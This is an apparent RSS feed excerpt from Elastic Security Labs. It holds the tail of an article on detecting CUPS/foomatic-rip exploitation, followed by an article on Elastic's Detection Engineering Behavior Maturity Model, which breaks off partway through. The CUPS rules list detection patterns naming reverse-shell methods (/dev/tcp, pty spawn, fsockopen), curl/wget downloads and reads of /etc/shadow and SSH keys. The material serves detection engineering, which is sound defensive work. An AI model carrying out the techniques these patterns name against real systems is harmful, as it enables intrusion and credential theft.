   process.name in (&quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;)] by process.entity_id
  [file where host.os.type == &quot;linux&quot; and event.type != &quot;deletion&quot; and
   not (process.name == &quot;gs&quot; and file.path like &quot;/tmp/gs_*&quot;)] by process.parent.entity_id
</code></pre>
<p>The rule excludes <code>/tmp/gs_*</code> to account for default <code>cupsd</code> behavior, but for enhanced security, you may choose to remove this exclusion, keeping in mind that it may generate more noise in alerts.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/image1.png" alt="" /></p>
<p><a href="https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml">https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml</a></p>
<h3>Suspicious execution from foomatic-rip or cupsd parent</h3>
<p>This rule detects suspicious command lines executed by child processes of <code>foomatic-rip</code> and <code>cupsd</code>. It focuses on identifying potentially malicious activities, including persistence mechanisms, file downloads, encoding/decoding operations, reverse shells, and shared-object loading via GTFOBins.</p>
<pre><code>process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and 
 event.action == &quot;exec&quot; and process.parent.name in 
 (&quot;foomatic-rip&quot;, &quot;cupsd&quot;) and process.command_line like (
  // persistence
  &quot;*cron*&quot;, &quot;*/etc/rc.local*&quot;, &quot;*/dev/tcp/*&quot;, &quot;*/etc/init.d*&quot;, 
  &quot;*/etc/update-motd.d*&quot;, &quot;*/etc/sudoers*&quot;,
  &quot;*/etc/profile*&quot;, &quot;*autostart*&quot;, &quot;*/etc/ssh*&quot;, &quot;*/home/*/.ssh/*&quot;, 
  &quot;*/root/.ssh*&quot;, &quot;*~/.ssh/*&quot;, &quot;*udev*&quot;, &quot;*/etc/shadow*&quot;, &quot;*/etc/passwd*&quot;,
    // Downloads
  &quot;*curl*&quot;, &quot;*wget*&quot;,

  // encoding and decoding
  &quot;*base64 *&quot;, &quot;*base32 *&quot;, &quot;*xxd *&quot;, &quot;*openssl*&quot;,

  // reverse connections
  &quot;*GS_ARGS=*&quot;, &quot;*/dev/tcp*&quot;, &quot;*/dev/udp/*&quot;, &quot;*import*pty*spawn*&quot;, &quot;*import*subprocess*call*&quot;, &quot;*TCPSocket.new*&quot;,
  &quot;*TCPSocket.open*&quot;, &quot;*io.popen*&quot;, &quot;*os.execute*&quot;, &quot;*fsockopen*&quot;, &quot;*disown*&quot;, &quot;*nohup*&quot;,

  // SO loads
  &quot;*openssl*-engine*.so*&quot;, &quot;*cdll.LoadLibrary*.so*&quot;, &quot;*ruby*-e**Fiddle.dlopen*.so*&quot;, &quot;*Fiddle.dlopen*.so*&quot;,
  &quot;*cdll.LoadLibrary*.so*&quot;,

  // misc. suspicious command lines
   &quot;*/etc/ld.so*&quot;, &quot;*/dev/shm/*&quot;, &quot;*/var/tmp*&quot;, &quot;*echo*&quot;, &quot;*&gt;&gt;*&quot;, &quot;*|*&quot;
)
</code></pre>
<p>Because this rule matches only an explicit list of suspicious command lines, we can broaden its scope to also cover the <code>cupsd</code> parent without fear of false positives.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/image2.png" alt="" /></p>
<p><a href="https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml">https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml</a></p>
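<p>The <code>like</code> patterns in the rule above are glob-style wildcards. A small hypothetical sketch shows how even a subset of them flags typical download and reverse-shell command lines:</p>

```python
from fnmatch import fnmatch

# A few of the wildcard patterns from the rule above (subset only).
SUSPICIOUS = ["*curl*", "*wget*", "*/dev/tcp/*", "*base64 *", "*/dev/shm/*"]


def is_suspicious(cmdline: str) -> bool:
    # EQL's `like` uses glob-style wildcards comparable to fnmatch.
    return any(fnmatch(cmdline, p) for p in SUSPICIOUS)
```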
<h3>Elastic’s Attack Discovery</h3>
<p>In addition to prebuilt content published, <a href="https://www.elastic.co/es/guide/en/security/current/attack-discovery.html">Elastic’s Attack Discovery</a> can provide context and insights by analyzing alerts in your environment and identifying threats by leveraging Large Language Models (LLMs). In the following example, Attack Discovery provides a short summary and a timeline of the activity. The behaviors are then mapped to an attack chain to highlight impacted stages and help triage the alerts.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/image4.png" alt="Elastic’s Attack Discovery summarizing findings for the CUPS Vulnerability" title="Elastic’s Attack Discovery summarizing findings for the CUPS Vulnerability" /></p>
<h2>Conclusion</h2>
<p>The recent CUPS vulnerability disclosure highlights the evolving threat landscape, underscoring the importance of securing services like printing. With a high CVSS score, this issue calls for immediate action, particularly given how easily these flaws can be exploited remotely. Although the service is installed by default on some UNIX operating systems (depending on the distribution), manual user interaction is needed to trigger the printer job. We recommend that users remain vigilant, continue hunting, and not underestimate the risk. While the threat requires user interaction, a paired spear-phishing document may coerce victims into printing with the rogue printer. Worse, attackers may silently replace existing printers or install new ones, as <a href="https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Impact">indicated</a> by @evilsocket.</p>
<p>We expect more to be revealed as the initial disclosure was labeled part 1. Ultimately, visibility and detection capabilities remain at the forefront of defensive strategies for these systems, ensuring that attackers cannot exploit overlooked vulnerabilities.</p>
<h2>Key References</h2>
<ul>
<li><a href="https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/">https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/</a></li>
<li><a href="https://github.com/RickdeJager/cupshax/blob/main/cupshax.py">https://github.com/RickdeJager/cupshax/blob/main/cupshax.py</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-47076">https://www.cve.org/CVERecord?id=CVE-2024-47076</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-47175">https://www.cve.org/CVERecord?id=CVE-2024-47175</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-47176">https://www.cve.org/CVERecord?id=CVE-2024-47176</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-47177">https://www.cve.org/CVERecord?id=CVE-2024-47177</a></li>
</ul>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/cups-overflow.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Elastic releases the Detection Engineering Behavior Maturity Model]]></title>
            <link>https://www.elastic.co/es/security-labs/elastic-releases-debmm</link>
            <guid>elastic-releases-debmm</guid>
            <pubDate>Fri, 06 Sep 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[Using this maturity model, security teams can make structured, measurable, and iterative improvements to their detection engineering teams.]]></description>
            <content:encoded><![CDATA[<h2>Detection Engineering Behavior Maturity Model</h2>
<p>At Elastic, we believe security is a journey, not a destination. As threats evolve and adversaries become more effective, security teams must continuously adapt and improve their processes to stay ahead of the curve. One of the key components of an effective security program is developing and managing threat detection rulesets. These rulesets are essential for identifying and responding to security incidents. However, the quality and effectiveness of these rulesets are directly influenced by the processes and behaviors of the security team managing them.</p>
<p>To address the evolving challenges in threat detection engineering and ensure consistent improvement across security teams, we have defined the <strong>Detection Engineering Behavior Maturity Model (DEBMM)</strong>. This model, complemented by other models and frameworks, provides a structured approach for security teams to consistently mature their processes and behaviors. By focusing on the team's processes and behaviors, the model ensures that detection rulesets are developed, managed, and improved effectively, regardless of the individual or the specific ruleset in question. This approach promotes a culture of continuous improvement and consistency in threat detection capabilities.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image5.png" alt="Detection Engineering Behavior Maturity Model" title="Detection Engineering Behavior Maturity Model" /></p>
<p>The Detection Engineering Behavior Maturity Model outlines five maturity tiers (Foundation, Basic, Intermediate, Advanced, and Expert) for security teams to achieve. Each tier builds upon the previous one, guiding teams through a structured and iterative process of enhancing their behaviors and practices. While teams may demonstrate behaviors at different tiers, skipping or deprioritizing criteria at the prior tiers is generally not recommended. Consistently meeting the expectations at each tier is crucial for creating a solid foundation for progression. However, measuring maturity over time becomes challenging as threats and technologies evolve, making it difficult to define maturity in an evergreen way. This model emphasizes continuous improvement rather than reaching a fixed destination, reflecting the ongoing nature of security work.</p>
<p>Note it is possible, and sometimes necessary, to attempt the behaviors of a higher tier in addition to the behaviors of your current tier. For example, attempting to enhance Advanced TTP Coverage may cover an immediate risk or threat, further cultivating expertise among engineers at the basic level.  This flexibility ensures that security teams can prioritize critical improvements and adapt to evolving threats without feeling constrained by the need to achieve perfection at each level. The dual dimensions of maturity ensure a balanced approach, fostering a culture of ongoing enhancement and adaptability. Additionally, the model is designed to complement well-adopted frameworks in the security domain, adding unique value by focusing on the maturity of the team's processes and behaviors that underpin effective detection ruleset management.</p>
<table>
<thead>
<tr>
<th align="center">Model/Framework</th>
<th align="center">Focus</th>
<th align="center">Contribution of the DEBMM</th>
</tr>
</thead>
<tbody>
<tr>
<td align="center">Hunting Maturity Model [<a href="https://www.sans.org/tools/hunting-maturity-model/">REF</a>]</td>
<td align="center">Proactive threat hunting practices and processes for improving threat detection capabilities.</td>
<td align="center">Enhances the proactive aspects by integrating regular and systematic threat-hunting activities into the ruleset development and management process.</td>
</tr>
<tr>
<td align="center">NIST Cybersecurity Framework (NIST CSF) [<a href="https://www.nist.gov/cyberframework">REF</a>]</td>
<td align="center">Identifying, Protecting, Detecting, Responding, and Recovering from cybersecurity threats.</td>
<td align="center">Enhances the 'Detect' function by offering a structured model specifically for detection ruleset maturity, aligning with NIST CSF's core principles and providing detailed criteria and measures for detection capabilities. It also leverages the Maturity Levels: Initial, Repeatable, Defined, Managed, and Optimized.</td>
</tr>
<tr>
<td align="center">MITRE ATT&amp;CK Framework [<a href="https://attack.mitre.org/">REF</a>]</td>
<td align="center">Describes common tactics, techniques, and procedures (TTPs) threat actors use.</td>
<td align="center">Supports creating, tuning, and validating detection rules that align with TTPs, ensuring comprehensive threat coverage and effective response mechanisms.</td>
</tr>
<tr>
<td align="center">ISO/IEC 27001 [<a href="https://www.iso.org/obp/ui/en/#iso:std:iso-iec:27001:ed-3:v1:en">REF</a>]</td>
<td align="center">Information security management systems (ISMS) and overall risk management.</td>
<td align="center">Contributes to the 'Detect' and 'Respond' domains by ensuring detection rules are systematically managed and continuously improved as part of an ISMS.</td>
</tr>
<tr>
<td align="center">SIM3 v2 – Security Incident Management Maturity Model [<a href="https://opencsirt.org/wp-content/uploads/2023/11/SIM3_v2_interim_standard.pdf">REF</a>]</td>
<td align="center">Maturity of security incident management processes.</td>
<td align="center">Integrates structured incident management practices into detection ruleset management, ensuring clear roles, documented procedures, effective communication, and continuous improvement.</td>
</tr>
<tr>
<td align="center">Detection Engineering Maturity Matrix [<a href="https://detectionengineering.io">REF</a>]</td>
<td align="center">Defines maturity levels for detection engineering, focusing on processes, technology, and team skills.</td>
<td align="center">Provides behavioral criteria and a structured approach to improving detection engineering processes.</td>
</tr>
</tbody>
</table>
<p>Among the several references listed in the table, the Detection Engineering Maturity Matrix is the closest related, given its goals and methodologies. The matrix defines precise maturity levels for processes, technology, and team skills, while the DEBMM builds on this foundation by emphasizing continuous improvement in engineering behaviors and practices. Together, they offer a comprehensive approach to advancing detection engineering capabilities, ensuring structural and behavioral excellence in managing detection rulesets while describing a common lexicon.</p>
<p><strong>A Small Note on Perspectives and the Importance of the Model</strong></p>
<p>Individuals with diverse backgrounds commonly perform detection engineering. People managing detection engineering processes must recognize and celebrate the value of diverse backgrounds; DEBMM is about teams of individuals, vendors, and users, each bringing different viewpoints to the process. This model lays the groundwork for more robust frameworks to follow, complementing existing ones previously mentioned while considering other perspectives.</p>
<h3>What is a threat detection ruleset?</h3>
<p>Before we dive into the behaviors necessary to mature our rulesets, let's first define the term. A threat detection ruleset is a group of rules that contain information and some form of query logic that attempts to match specific threat activity in collected data. These rules typically have a schema, information about the intended purpose, and a query formatted for its specific query language to match threat behaviors. Below are some public examples of threat detection rulesets:</p>
<ul>
<li>Elastic:  <a href="https://github.com/elastic/detection-rules">Detection Rules</a> | <a href="https://github.com/elastic/protections-artifacts">Elastic Defend Rules</a></li>
<li>Sigma: <a href="https://github.com/SigmaHQ/sigma">Sigma Rules</a></li>
<li>DataDog: <a href="https://docs.datadoghq.com/security/detection_rules/">Detection Rules</a></li>
<li>Splunk: <a href="https://research.splunk.com/detections/">Detections</a></li>
<li>Panther: <a href="https://github.com/panther-labs/panther-analysis">Detection Rules</a></li>
</ul>
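<p>As a concrete illustration, a single rule in such a ruleset might be represented as metadata plus query logic. The sketch below is hypothetical; the field names are loosely modeled on common ruleset schemas, and the query string is illustrative rather than a real production rule:</p>

```python
# A minimal sketch of a detection rule: metadata plus query logic.
# Field names and values are illustrative, not a real product schema.
from dataclasses import dataclass, field

@dataclass
class DetectionRule:
    rule_id: str
    name: str
    description: str
    severity: str                  # e.g. "low", "medium", "high", "critical"
    query: str                     # query written in the engine's own language
    mitre_technique_ids: list = field(default_factory=list)
    tags: list = field(default_factory=list)

rule = DetectionRule(
    rule_id="example-0001",
    name="AWS S3 Bucket Policy Made Public",
    description="Detects an S3 bucket policy change that allows public access.",
    severity="high",
    query='event.provider:"s3.amazonaws.com" and event.action:"PutBucketPolicy"',
    mitre_technique_ids=["T1098"],
    tags=["AWS", "Cloud"],
)
print(rule.severity)  # high
```

Real rulesets (such as those linked above) carry many more fields, but this shape — schema, descriptive information, and a query targeting threat behavior — is the common denominator.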
<p>Detection rulesets often fall between simple Indicator of Compromise (IOC) matching and programmable detections, such as those written in Python for Panther. They balance flexibility and power, although they are constrained by the detection scripting language's design biases and the detection engine's features. It is important to note that this discussion is focused on search-based detection rules typically used in SIEM (Security Information and Event Management) systems. Other types of detections, including on-stream and machine learning-based detections, can complement SIEM rules but are not explicitly covered by this model.</p>
<p>Rulesets can be further categorized based on specific criteria. For example, one might assess the Amazon Web Services (AWS) ruleset in Elastic’s Detection Rules repository rather than rules based on all available data sources. Other categories might include all cloud-related rulesets, credential access rulesets, etc.</p>
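<p>Categorizing a ruleset this way can be as simple as filtering rules by a tag or data source. A minimal sketch, using hypothetical rules and tags:</p>

```python
# Hypothetical rules represented as dicts; names and tags are illustrative.
rules = [
    {"name": "AWS S3 Public Access", "tags": ["AWS", "Cloud"]},
    {"name": "Azure Role Assignment", "tags": ["Azure", "Cloud"]},
    {"name": "Kerberoasting Attempt", "tags": ["Windows", "Credential Access"]},
]

def ruleset(rules, tag):
    """Return the sub-ruleset whose rules carry the given tag."""
    return [r for r in rules if tag in r["tags"]]

print(len(ruleset(rules, "Cloud")))                           # 2
print([r["name"] for r in ruleset(rules, "Credential Access")])  # ['Kerberoasting Attempt']
```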
<h3>Why ruleset maturity is important</h3>
<p><strong>Problem:</strong> It shouldn't matter which kind of ruleset you use; they all benefit from a system that promotes effectiveness and rigor. The following issues are more prominent if you're using an ad-hoc or nonexistent system of maturity:</p>
<ul>
<li>SOC Fatigue and Low Detection Accuracy: High alert volumes overwhelm SOC analysts and lead to burnout, a problem compounded by low-fidelity detection logic and high false positive (FP) rates that generate many alerts for activity that is not actually malicious.</li>
<li>Lack of Contextual Information and Poor Documentation: Detection rules that trigger alerts without enough context to understand an event's significance or guide a course of action, combined with insufficient documentation of each rule's purpose, logic, and expected outcomes.</li>
<li>Inconsistent Rule Quality: Variability in the quality and effectiveness of detection rules.</li>
<li>Outdated Detection Logic: Detection rules that are not updated to reflect the latest threat intelligence and attack techniques.</li>
<li>Overly Complex Rules: Detection rules that are too complex, making them difficult to maintain and understand.</li>
<li>Lack of Automation: Reliance on manual processes for rule updates, alert triage, and response.</li>
<li>Inadequate Testing and Validation: Detection rules that are not thoroughly tested and validated before deployment.</li>
<li>Inflexible Rulesets: Detection rules that are not adaptable to environmental changes or new attack techniques.</li>
<li>Lack of Metrics, Measurement, and Coverage Insights: Insufficient metrics to measure the effectiveness, performance, and coverage of detection rules across different areas.</li>
<li>Siloed Threat Intelligence: Threat intelligence that is not integrated with detection rules, leading to fragmented and incomplete threat detection.</li>
<li>Inability to Prioritize New Rule Creation: Without a maturity system, teams might focus on quick wins or more exciting areas rather than what is needed.</li>
</ul>
<p><strong>Opportunity:</strong> This model encourages a structured approach to developing, managing, improving, and maintaining quality detection rulesets, helping security teams to:</p>
<ul>
<li>Reduce SOC fatigue by optimizing alert volumes and improving accuracy.</li>
<li>Enhance detection fidelity with regularly updated and well-tested rules.</li>
<li>Ensure consistent and high-quality detection logic across the entire ruleset.</li>
<li>Integrate contextual information and threat intelligence for more informed alerting.</li>
<li>Automate routine processes to improve efficiency and reduce manual errors.</li>
<li>Continuously measure and improve the performance of detection rules.</li>
<li>Stay ahead of threats, maintain effective detection capabilities, and enhance their overall security posture.</li>
</ul>
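<p>Two of the outcomes above, optimized alert volume and improved accuracy, can be measured directly from triaged alerts. A minimal sketch with hypothetical triage data:</p>

```python
# Sketch of two ruleset health metrics: per-rule false positive rate and
# alert volume, computed from triaged alerts. Data is hypothetical.
from collections import Counter

# (rule_name, analyst_verdict) pairs from alert triage
alerts = [
    ("Suspicious PowerShell", "true_positive"),
    ("Suspicious PowerShell", "false_positive"),
    ("Suspicious PowerShell", "false_positive"),
    ("Rare DNS Tunnel", "true_positive"),
]

def fp_rate(alerts, rule_name):
    """Fraction of a rule's alerts that analysts judged false positives."""
    verdicts = [v for r, v in alerts if r == rule_name]
    return verdicts.count("false_positive") / len(verdicts)

volume = Counter(r for r, _ in alerts)
print(round(fp_rate(alerts, "Suspicious PowerShell"), 2))  # 0.67
print(volume["Suspicious PowerShell"])                     # 3
```

A noisy rule like the one above would be a candidate for tuning or a diagnostic (beta) phase before it contributes further to SOC fatigue.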
<h3>Understanding the DEBMM Structure</h3>
<p>The DEBMM is segmented into <strong>tiers</strong>, each composed of <strong>criteria</strong> that <strong>quantitatively and qualitatively</strong> convey maturity across different <strong>levels</strong>, each contributing to clear progression outcomes. It is designed to guide security teams through a structured set of behaviors to develop, manage, and maintain their detection rulesets.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image2.png" alt="DEBMM Tier Structure" title="DEBMM Tier Structure" /></p>
<h4>Tiers</h4>
<p>The DEBMM employs a multidimensional approach to maturity, encompassing both high-level tiers and granular levels of behaviors within each tier. The first dimension involves the overall maturity tiers, where criteria should be met progressively to reflect overall maturity. The second dimension pertains to the levels of behaviors within each tier, highlighting specific practices and improvements that convey maturity. This structure allows for flexibility and recognizes that maturity can be demonstrated in various ways. The second dimension loosely aligns with the NIST Cybersecurity Framework (CSF) maturity levels (Initial, Repeatable, Defined, Managed, and Optimized), providing a <em>familiar reference point</em> for security teams. For instance, the qualitative behaviors and quantitative measurements within each DEBMM tier mirror the iterative refinement and structured process management advocated by the NIST CSF. By aligning with these principles, the DEBMM ensures that as teams progress through its tiers, they also embody the best practices and structured approach seen in the NIST CSF.</p>
<p>At a high level, the DEBMM consists of five maturity tiers, each building upon the previous one:</p>
<ol>
<li><strong>Tier 0: Foundation</strong> - No structured approach to rule development and management. Rules are created and maintained ad-hoc, with little documentation, peer review, stakeholder communication, or personnel training.</li>
<li><strong>Tier 1: Basic</strong> - Establishment of baseline rules, systematic rule management, version control, documentation, regular reviews of the threat landscape, and initial personnel training.</li>
<li><strong>Tier 2: Intermediate</strong> - Focus on continuously tuning rules to reduce false positives, identifying and documenting gaps, thorough internal testing and validation, and ongoing training and development for personnel.</li>
<li><strong>Tier 3: Advanced</strong> - Systematic identification and reduction of missed threats (false negatives), external validation of rules, coverage of advanced TTPs, and advanced training for analysts and security experts.</li>
<li><strong>Tier 4: Expert</strong> - This level is characterized by advanced automation, seamless integration with other security tools, continuous improvement through regular updates and external collaboration, and comprehensive training programs for all levels of security personnel. Proactive threat hunting plays a crucial role in maintaining a robust security posture. It complements the ruleset, enhancing the management process by identifying new patterns and insights that can be incorporated into detection rules. Additionally, although not commonly practiced by vendors, detection development as a post-phase of incident response can provide valuable insights and enhance the overall effectiveness of the detection strategy.</li>
</ol>
<p>It's ideal to progress through these tiers following an approach that best meets the security team's needs (e.g., sequentially, prioritizing by highest risk, etc.). Progressing through the tiers comes with increased operational costs, and rushing through the maturity model without proper budget and staff can lead to burnout and worsen the situation. Skipping foundational practices in the lower tiers can undermine the effectiveness of more advanced activities in the higher tiers.</p>
<p>Consistently meeting the expectations at each tier ensures a solid foundation for moving to the next level. Organizations should strive to iterate and improve continuously, recognizing that maturity is dynamic. The expert tier represents an advanced state of maturity, but it is not the final destination; it requires ongoing commitment and adaptation to stay at that level. Organizations may experience fluctuations in their maturity level depending on the frequency and accuracy of assessments. This is why the focus should be on iterative development, recognizing that different maturity levels within the tiers may be appropriate based on the organization's specific needs and resources.</p>
<h4>Criteria and Levels</h4>
<p>Each tier is broken down into specific criteria that security teams must meet. These criteria encompass various aspects of detection ruleset management, such as rule creation, management, telemetry quality, threat landscape review, stakeholder engagement, and more.</p>
<p>Within each criterion, there are qualitative behaviors and quantitative measurements that define the levels of maturity:</p>
<ul>
<li><strong>Qualitative Behaviors - State of Ruleset:</strong> These subjective assessments are based on the quality and thoroughness of the ruleset and its documentation. They provide a way to evaluate the current state of the ruleset, helping threat researchers and detection engineers understand and articulate the maturity of their ruleset in a structured manner. While individual perspectives can influence these behaviors and may vary between assessors, they are helpful for initial assessments and for providing detailed insights into the ruleset's state.</li>
<li><strong>Quantitative Measurements - Activities to Maintain State</strong>: These provide a structured way to measure the activities and processes that maintain or improve the ruleset. They are designed to be more reliable for comparing the maturity of different rulesets and help track progress over time. While automation can help measure these metrics consistently, reflecting the latest state of maturity, each organization needs to define the ideal for its specific context. The exercise of determining and calculating these metrics will contribute significantly to the maturity process, ensuring that the measures are relevant and tailored to the unique needs and goals of the security team. Use this model as guidance, but establish and adjust specific calculations and metrics according to your organizational requirements and objectives.</li>
</ul>
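<p>As an illustration of how a quantitative measurement might be computed and mapped back to a level, consider the share of rules that are documented or peer-reviewed. The thresholds below are examples only, not prescribed by the DEBMM; as noted above, each organization should establish its own calculations and targets:</p>

```python
# Sketch: derive one quantitative measurement (percentage of rules that are
# documented / peer-reviewed) and map it to an illustrative maturity level.
rules = [
    {"name": "r1", "documented": True,  "peer_reviewed": True},
    {"name": "r2", "documented": True,  "peer_reviewed": False},
    {"name": "r3", "documented": False, "peer_reviewed": False},
    {"name": "r4", "documented": True,  "peer_reviewed": True},
]

def pct(rules, key):
    """Percentage of rules for which the given boolean field is true."""
    return 100 * sum(r[key] for r in rules) / len(rules)

def level(p):
    # Example thresholds only; tune these to your organization's targets.
    for name, floor in [("Optimized", 90), ("Managed", 70),
                        ("Defined", 50), ("Repeatable", 20)]:
        if p >= floor:
            return name
    return "Initial"

print(level(pct(rules, "documented")))     # 75% documented -> Managed
print(level(pct(rules, "peer_reviewed")))  # 50% peer-reviewed -> Defined
```

Automating a computation like this against the ruleset repository keeps the measurements current, which is exactly the consistency the model asks for.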
<p>Similar to Tiers, each level within the qualitative and quantitative measurements builds upon the previous one, indicating increasing maturity and sophistication in the approach to detection ruleset management. The goal is to provide clear outcomes and a roadmap for security teams to systematically and continuously improve their detection rulesets.</p>
<h4>Scope of Effort to Move from Basic to Expert</h4>
<p>Moving from the basic to the expert tier involves a significant and sustained effort. As teams progress through the tiers, the complexity and depth of activities increase, requiring more resources, advanced skills, and comprehensive strategies. For example, transitioning from Tier 1 to Tier 2 involves systematic rule tuning and detailed gap analysis, while advancing to Tier 3 and Tier 4 requires robust external validation processes, proactive threat hunting, and sophisticated automation. This journey demands commitment, continuous learning, and adaptation to the evolving threat landscape.</p>
<h4>Tier 0: Foundation</h4>
<p>At the foundational tier, teams must begin building a structured approach to rule development and management. Detection rules may start out created and maintained ad hoc, with little to no peer review, and often lacking proper documentation and stakeholder communication. Initially, threat modeling rarely influences the creation and management of detection rules, resulting in a reactive rather than proactive approach to threat detection. Additionally, there may be little to no roadmap documented or planned for rule development and updates, leading to inconsistent and uncoordinated efforts.</p>
<p>Establishing standards for what defines a good detection rule is essential to guiding teams toward higher maturity levels. It is important to recognize that a rule may not be perfect in its infancy and will require continuous improvement over time. This is acceptable if analysts are committed to consistently refining and enhancing the rule. We provide recommendations on what a good rule looks like based on our experience, but organizations must define their perfect rule considering their available capabilities and resources.</p>
<p>Regardless of the ruleset, a rule should include specific fields that ensure its effectiveness and accuracy. Different maturity levels will handle these fields with varying completeness and accuracy. While more content provides more opportunities for mistakes, the quality of a rule should improve with the maturity of the ruleset. For example, a better query with fewer false positives, more descriptions with detailed information, and up-to-date MITRE ATT&amp;CK information are indicators of higher maturity.</p>
<p>By establishing and progressively improving these criteria, teams can enhance the quality and effectiveness of their detection rulesets. Fundamentally, it starts with developing, managing, and maintaining a single rule. Creating a roadmap for rule development and updates, even at the most basic level, can provide direction and ensure that improvements are systematically tracked and communicated. Most fields should be validated against a defined schema to provide consistency. For more details, see the <a href="#Example-Rule-Metadata">Example Rule Fields</a>.</p>
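<p>Schema validation at this tier can start very small. The sketch below checks a rule dictionary against a defined schema; the required fields and types are illustrative, not a real product schema:</p>

```python
# A minimal sketch of validating rule fields against a defined schema.
# Required fields and their types are illustrative assumptions.
SCHEMA = {
    "rule_id": str,
    "name": str,
    "description": str,
    "severity": str,
    "query": str,
}

def validate(rule: dict) -> list:
    """Return a list of schema violations (empty if the rule conforms)."""
    errors = []
    for field_name, field_type in SCHEMA.items():
        if field_name not in rule:
            errors.append(f"missing field: {field_name}")
        elif not isinstance(rule[field_name], field_type):
            errors.append(f"wrong type for {field_name}")
    return errors

rule = {"rule_id": "example-0001", "name": "Test Rule", "query": "process.name:*"}
print(validate(rule))  # ['missing field: description', 'missing field: severity']
```

Even this crude check, run on every rule before release, enforces the consistency the foundational tier is after; richer validation (query parsing, enum values, ATT&amp;CK ID formats) can be layered on as the team matures.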
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image6.png" alt="DEBMM - Tier 0" title="DEBMM - Tier 0" /></p>
<h5>Criteria</h5>
<h6>Structured Approach to Rule Development and Management</h6>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No structured approach; rules created randomly without documentation.</li>
<li>Repeatable: Minimal structure; some rules are created with basic documentation.</li>
<li>Defined: Standardized process for rule creation with detailed documentation and alignment with defined schemas.</li>
<li>Managed: Regularly reviewed and updated rules, ensuring consistency and adherence to documented standards, with stakeholder involvement.</li>
<li>Optimized: Continuous improvement based on feedback and evolving threats, with automated rule creation and management processes.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No formal activities for rule creation.</li>
<li>Repeatable: Sporadic creation of rules with minimal oversight or review; less than 20% of rules have complete documentation; less than 10% of rules are aligned with a defined schema; rules created do not undergo any formal approval process.</li>
<li>Defined: Regular creation and documentation of rules, with 50-70% alignment to defined schemas and peer review processes.</li>
<li>Managed: Comprehensive creation and management activities, with 70-90% of rules having complete documentation and formal approval processes.</li>
<li>Optimized: Fully automated and integrated rule creation and management processes, with 90-100% alignment to defined schemas and continuous documentation updates.</li>
</ul>
</li>
</ul>
<h6>Creation and Maintenance of Detection Rules</h6>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: Rules created and modified ad hoc, without version control.</li>
<li>Repeatable: Occasional updates to rules, but without a systematic process.</li>
<li>Defined: Systematic process for rule updates, including version control and regular documentation.</li>
<li>Managed: Regular, structured updates with detailed documentation, version control, and stakeholder communication.</li>
<li>Optimized: Continuous rule improvement with automated updates, comprehensive documentation, and proactive stakeholder engagement.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No formal activities to maintain detection rules.</li>
<li>Repeatable: Rules are updated sporadically, with less than 50% of rules reviewed annually; more than 30% of rules have missing or incomplete descriptions, references, or documentation; less than 20% of rules are peer-reviewed; less than 20% of rules include escalation procedures or guides; less than 15% of rules have associated metadata for tracking rule effectiveness and modifications.</li>
<li>Defined: Regular updates with 50-70% of rules reviewed annually; detailed descriptions, references, and documentation for most rules; 50% of rules are peer-reviewed.</li>
<li>Managed: Comprehensive updates with 70-90% of rules reviewed annually; complete descriptions, references, and documentation for most rules; 70% of rules are peer-reviewed.</li>
<li>Optimized: Automated updates with 90-100% of rules reviewed annually; thorough descriptions, references, and documentation for all rules; 90-100% of rules are peer-reviewed and include escalation procedures and guides.</li>
</ul>
</li>
</ul>
<h6>Roadmap Documented or Planned</h6>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No roadmap documented or planned for rule development and updates.</li>
<li>Repeatable: A basic roadmap exists for some rules, with occasional updates and stakeholder communication.</li>
<li>Defined: A comprehensive roadmap is documented for most rules, with regular updates and stakeholder involvement.</li>
<li>Managed: Detailed, regularly updated roadmap covering all rules, with proactive stakeholder communication and involvement.</li>
<li>Optimized: Dynamic, continuously updated roadmap integrated into organizational processes, with full stakeholder engagement and alignment with strategic objectives.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No documented roadmap for rule development and updates.</li>
<li>Repeatable: Basic roadmap documented for less than 30% of rules; fewer than two roadmap updates or stakeholder meetings per year; less than 20% of rules have a planned update schedule; no formal process for tracking roadmap progress.</li>
